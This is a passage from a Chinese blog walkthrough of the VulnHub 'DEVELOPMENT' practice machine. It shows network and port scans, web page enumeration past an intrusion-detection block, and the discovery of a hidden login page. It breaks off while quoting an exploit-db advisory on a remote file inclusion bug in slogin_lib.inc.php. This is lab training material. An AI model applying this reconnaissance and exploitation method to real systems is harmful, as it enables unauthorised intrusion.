靶机渗透练习54-digitalworld.local:DEVELOPMENT

于 2022-04-19 16:15:00 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: 靶机渗透练习 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Perpetual_Blue/article/details/124265792
版权

靶机描述

靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-development,280/

Description

This machine reminds us of a DEVELOPMENT environment: misconfigurations rule the roost. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived, and made slightly more nefarious than the original.

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Development is (#1): different from production, (#2): a mess of code, (#3): under construction.

Note: Some users report the box may seem to be “unstable” with aggressive scanning. The homepage gives a clue why.

Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.

一、搭建靶机环境

攻击机Kali

IP地址:192.168.128.128

靶机

IP地址:192.168.128.132

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VMware Workstation,设置为NAT模式

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth1 -l

⬢  kali  arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:b5:12:9d, IPv4: 192.168.128.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.128.1   00:50:56:c0:00:08       VMware, Inc.
192.168.128.2   00:50:56:f4:41:f5       VMware, Inc.
192.168.128.132 00:0c:29:c0:3e:ca       VMware, Inc.
192.168.128.254 00:50:56:fb:5c:73       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.939 seconds (132.03 hosts/sec). 4 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.128.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.128.0/24

方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢  kali  nmap -A -sV -T4 -p- 192.168.128.132
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 14:59 CST
Nmap scan report for bogon (192.168.128.132)
Host is up (0.00036s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0
|_http-server-header: IIS 6.0
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Wed, 23 Mar 2022 06:59:25 GMT
|     Server: IIS 6.0
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
|     ETag: "230-57de32091ad69"
|     Accept-Ranges: bytes
|     Content-Length: 560
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <html>
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
|     </head>
|     <body>
|     <p>Welcome to the Development Page.</p>
|     <br/>
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>
|     <br/>
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
|     <br/>
|     <br/>
|     <br/>
|     <hr>
|     <i>Powered by IIS 6.0</i>
|     </body>
|     <!-- Searching for development secret page... where could it be? -->
|     <!-- Patrick, Head of Development-->
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Wed, 23 Mar 2022 06:59:25 GMT
|     Server: IIS 6.0
|     Allow: GET,POST,OPTIONS,HEAD
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Wed, 23 Mar 2022 06:59:25 GMT
|     Server: IIS 6.0
|     Content-Length: 294
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>IIS 6.0 Server at 192.168.128.132 Port 8080</address>
|_    </body></html>
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=3/23%Time=623AC54E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2023\x20Mar\x202
SF:022\x2006:59:25\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\x20W
SF:ed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de32091
SF:ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary:\x2
SF:0Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/html\
SF:r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR\x20
SF:OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welcome\
SF:x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20are\x
SF:20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20thes
SF:e\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20We\x
SF:20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection\x20
SF:system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@goodte
SF:ch\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\x20b
SF:y\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20deve
SF:lopment\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20-->\
SF:r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</html>\
SF:r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2023\x
SF:20Mar\x202022\x2006:59:25\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow:\x2
SF:0GET,POST,OPTIONS,HEAD\r\nContent-Length:\x200\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CD,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nDate:\x20Wed,\x2023\x20Mar\x202022\x2006:59:2
SF:5\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20294\r\nConnect
SF:ion:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\r\n\
SF:r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">
SF:\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>\n<h
SF:1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x20th
SF:at\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>\n<h
SF:r>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.128\.132\x20Port\
SF:x208080</address>\n</body></html>\n");
MAC Address: 00:0C:29:C0:3E:CA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time: 
|   date: 2022-03-23T07:00:56
|_  start_date: N/A
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: development
|   NetBIOS computer name: DEVELOPMENT\x00
|   Domain name: \x00
|   FQDN: development
|_  System time: 2022-03-23T07:00:56+00:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms bogon (192.168.128.132)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.34 seconds
⬢  kali

22—ssh—OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

113—ident?

139—netbios-ssn—Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445–netbios-ssn—Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

8080—http-proxy—IIS 6.0

这边安排另一款扫描工具rustscan
⬢  下载  rustscan -b 5000 -a 192.168.128.132 -- -A | tee rustscan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.128.132:22
Open 192.168.128.132:113
Open 192.168.128.132:139
Open 192.168.128.132:445
Open 192.168.128.132:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 15:19 CST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:19
Completed NSE at 15:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:19
Completed NSE at 15:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:19
Completed NSE at 15:19, 0.00s elapsed
Initiating ARP Ping Scan at 15:19
Scanning 192.168.128.132 [1 port]
Completed ARP Ping Scan at 15:19, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:19
Completed Parallel DNS resolution of 1 host. at 15:19, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:19
Scanning bogon (192.168.128.132) [5 ports]
Discovered open port 22/tcp on 192.168.128.132
Discovered open port 139/tcp on 192.168.128.132
Discovered open port 445/tcp on 192.168.128.132
Discovered open port 8080/tcp on 192.168.128.132
Discovered open port 113/tcp on 192.168.128.132
Completed SYN Stealth Scan at 15:19, 0.03s elapsed (5 total ports)
Initiating Service scan at 15:19
Scanning 5 services on bogon (192.168.128.132)
Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 15:21 (0:00:44 remaining)
Completed Service scan at 15:21, 96.12s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against bogon (192.168.128.132)
NSE: Script scanning 192.168.128.132.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:21
Completed NSE at 15:21, 1.19s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:21
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (2 waiting)
NSE Timing: About 95.00% done; ETC: 15:21 (0:00:00 remaining)
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (2 waiting)
NSE Timing: About 95.00% done; ETC: 15:21 (0:00:00 remaining)
Completed NSE at 15:21, 1.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
Nmap scan report for bogon (192.168.128.132)
Host is up, received arp-response (0.00029s latency).
Scanned at 2022-03-23 15:19:35 CST for 100s

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/0O8beKKMGvekLefDRWa/MVhJwXr1B0PuQHDt8xlqKcpvdLCO6b0c+sfcemEq7m92V82fTy2BAvvkk9GZSQ+OrDfWzB1grIl6t9ndVBB++rz/rZBwmZ/VcSBLSwjRAnrHRiyCtunxDiWYwD2htq5FV2r4K38+YrWARqpapME/K/atz9Txxe4WwzihPB+910b0dG4JAn8hXG8VHZsJvo4qV0/yEcSgwD9B4QV6XK3uxOnHviWUEJTOHU12LAz39KYj5Pir9BmSsfrbDgt4s06zR1RqviIF+GIJkbeWR5V5Mn9CazLuPmyrmybsFEfFMh5VeDJ33eCeGLhmHYoGEJ6p
|   256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvQyP65/4gxE9tbpAIijwT4kwjUtquJDVqd3+iNB0pN
113/tcp  open  ident?      syn-ack ttl 64
|_auth-owners: oident
139/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  syn-ack ttl 64 IIS 6.0
|_http-server-header: IIS 6.0
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Wed, 23 Mar 2022 07:19:40 GMT
|     Server: IIS 6.0
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
|     ETag: "230-57de32091ad69"
|     Accept-Ranges: bytes
|     Content-Length: 560
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <html>
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
|     </head>
|     <body>
|     <p>Welcome to the Development Page.</p>
|     <br/>
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>
|     <br/>
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
|     <br/>
|     <br/>
|     <br/>
|     <hr>
|     <i>Powered by IIS 6.0</i>
|     </body>
|     <!-- Searching for development secret page... where could it be? -->
|     <!-- Patrick, Head of Development-->
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Wed, 23 Mar 2022 07:19:40 GMT
|     Server: IIS 6.0
|     Allow: GET,POST,OPTIONS,HEAD
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Wed, 23 Mar 2022 07:19:40 GMT
|     Server: IIS 6.0
|     Content-Length: 294
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>IIS 6.0 Server at 192.168.128.132 Port 8080</address>
|_    </body></html>
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=3/23%Time=623ACA0D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2023\x20Mar\x202
SF:022\x2007:19:40\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\x20W
SF:ed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de32091
SF:ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary:\x2
SF:0Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/html\
SF:r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR\x20
SF:OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welcome\
SF:x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20are\x
SF:20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20thes
SF:e\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20We\x
SF:20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection\x20
SF:system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@goodte
SF:ch\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\x20b
SF:y\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20deve
SF:lopment\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20-->\
SF:r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</html>\
SF:r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2023\x
SF:20Mar\x202022\x2007:19:40\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow:\x2
SF:0GET,POST,OPTIONS,HEAD\r\nContent-Length:\x200\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CD,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nDate:\x20Wed,\x2023\x20Mar\x202022\x2007:19:4
SF:0\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20294\r\nConnect
SF:ion:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\r\n\
SF:r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">
SF:\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>\n<h
SF:1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x20th
SF:at\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>\n<h
SF:r>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.128\.132\x20Port\
SF:x208080</address>\n</body></html>\n");
MAC Address: 00:0C:29:C0:3E:CA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/23%OT=22%CT=%CU=39573%PV=Y%DS=1%DC=D%G=N%M=000C29%TM
OS:=623ACA6B%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10E%TI=Z%CI=I%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7
OS:120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 14.414 days (since Wed Mar  9 05:25:30 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 4368/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 64248/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 41101/udp): CLEAN (Failed to receive data)
|   Check 4 (port 29009/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   DEVELOPMENT<00>      Flags: <unique><active>
|   DEVELOPMENT<03>      Flags: <unique><active>
|   DEVELOPMENT<20>      Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-23T07:21:12
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: development
|   NetBIOS computer name: DEVELOPMENT\x00
|   Domain name: \x00
|   FQDN: development
|_  System time: 2022-03-23T07:21:12+00:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms bogon (192.168.128.132)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.23 seconds
           Raw packets sent: 28 (2.026KB) | Rcvd: 20 (1.498KB)

2.2枚举漏洞

2.2.1 22 端口分析

一般只能暴力破解,暂时没有合适的字典

2.2.2 8080 端口分析

访问:http://192.168.128.132:8080/

image-20220323153636911

根据说明有隐藏页面,然而dirb,gobuster 等都无法目录扫描,应该也是像页面提示说的一样被入侵检测系统拦截了,那怎么找目录呢,这就有点脑洞了,原来隐藏目录就是html_pages

还是扫描一下目录试试:gobuster dir --url http://192.168.128.132:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,tar,php,zip,bak,html结果,扫了一下,就被拦截了,其他的工具,根本没法开始

⬢  DEVELOPMENT  gobuster dir --url http://192.168.128.132:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,tar,php,zip,bak,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.128.132:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,tar,php,zip,bak,html
[+] Timeout:                 10s
===============================================================
2022/03/23 15:35:49 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 560]
/about                (Status: 200) [Size: 936]
/about.html           (Status: 200) [Size: 285]
/default.html         (Status: 200) [Size: 199]
/login.html           (Status: 200) [Size: 191]
/register.html        (Status: 200) [Size: 682]
/downloads.html       (Status: 200) [Size: 336]
/uploads.html         (Status: 200) [Size: 1083]

访问: http://192.168.128.132:8080/html_pages

image-20220323154335273

-rw-r--r-- 1 www-data www-data      285 Sep 26 17:46 about.html
-rw-r--r-- 1 www-data www-data     1049 Sep 26 17:51 config.html
-rw-r--r-- 1 www-data www-data      199 Jul 23 15:37 default.html
-rw-r--r-- 1 www-data www-data     1086 Sep 28 09:22 development.html
-rw-r--r-- 1 www-data www-data      446 Jun 14 01:37 downloads.html
-rw-r--r-- 1 www-data www-data      285 Sep 26 17:53 error.html
-rw-r--r-- 1 www-data www-data        0 Sep 28 09:23 html_pages
-rw-r--r-- 1 www-data www-data      751 Sep 28 09:22 index.html
-rw-r--r-- 1 www-data www-data      202 Sep 26 17:57 login.html
-rw-r--r-- 1 www-data www-data      682 Jul 23 15:36 register.html
-rw-r--r-- 1 www-data www-data       74 Jul 23 16:29 tryharder.html
-rw-r--r-- 1 www-data www-data      186 Sep 26 17:58 uploads.html

访问:http://192.168.128.132:8080/about.html

image-20220323154545109

image-20220323155608974

访问:http://192.168.128.132:8080/config.html

image-20220323154632503

访问:http://192.168.128.132:8080/default.html,得到01001000 01010101 01001000 00111111

image-20220323154724126

访问:http://192.168.128.132:8080/development.html

image-20220323155019104

image-20220323155810180

同时在查看源码发现提示,进入秘密页面/developmentsecretpage

image-20220323155928112

访问:http://192.168.128.132:8080/developmentsecretpage/

image-20220323160118123

image-20220323160130800

image-20220323160141576

发现登录页面 ,无论输入什么都是报错,爆破注入什么的别想了,都是连接超时,smb服务爆破同样结局,看来入侵检测系统有两把刷子啊,不管怎样就是不能扫描

image-20220323160223379

页面暂时陷入僵局,然后就十分考知识储备或运气了

访问:http://192.168.128.132:8080/downloads.html

image-20220323155111499

这是两个图,没啥东西

image-20220323160326466

image-20220323160342713

但是在源码中发现

image-20220323160418338

下载流量包,先放一边

访问:http://192.168.128.132:8080/error.html

image-20220323155228761

访问:http://192.168.128.132:8080/login.html

image-20220323155359560

image-20220323160738757

访问:http://192.168.128.132:8080/register.html

image-20220323155341771

内容:

01010011 01110101 01110010 01100101 01101100 01111001 00100000 01100100 01100101 01110110 01100101 01101100 01101111 01110000 01101101 01100101 01101110 01110100 00100000 01110011 01100101 01100011 01110010 01100101 01110100 00100000 01110000 01100001 01100111 01100101 00100000 01101001 01110011 00100000 01101110 01101111 01110100 00100000 01110100 01101000 01100001 01110100 00100000 01101000 01100001 01110010 01100100 00100000 01110100 01101111 00100000 01100110 01101001 01101110 01100100 00111111

访问:http://192.168.128.132:8080/tryharder.html

image-20220323155432556

image-20220323160843976

访问:http://192.168.128.132:8080/uploads.html

image-20220323155507584

image-20220323160922671

2.3漏洞利用

2.3.1 slogin_lib.inc.php远程文件包含漏洞

搜索一下,在登录报错的特殊文件slogin_lib.inc.php

image-20220323161346126

同时在https://www.exploit-db.com/exploits/7444

查到漏洞具体信息

[START]

#########################################################################################
[0x01] Informations:

Script         : Simple Text-File Login script 1.0.6
Download       : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
Author         : Osirys
Contact        : osirys[at]live[dot]it
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay
Notes          : *

* The name of this login system is Simple Text-File Login script, so we can already 
  understand that this script will use a .txt file to do his job. So it's like if
  the coder didn't think that a login system like this isn't vulnerable. Weird !
  Anyway, it's vulnerable to Remote File Inclusion also, here we are !

#########################################################################################
[0x02] Bug:[Remote File Inclusion]
######

Bugged file is: /[path]/slogin_lib.inc.php

[CODE]
90.  if (!isset ($slogin_path)) {
91.    $slogin_path = "";
92. }
[/CODE]

If $slogin_path is not given, becomes a null variable. Scrolling down the source code,
you can see an include of that variable everywhere.
Just one of the few vulnerable includes:

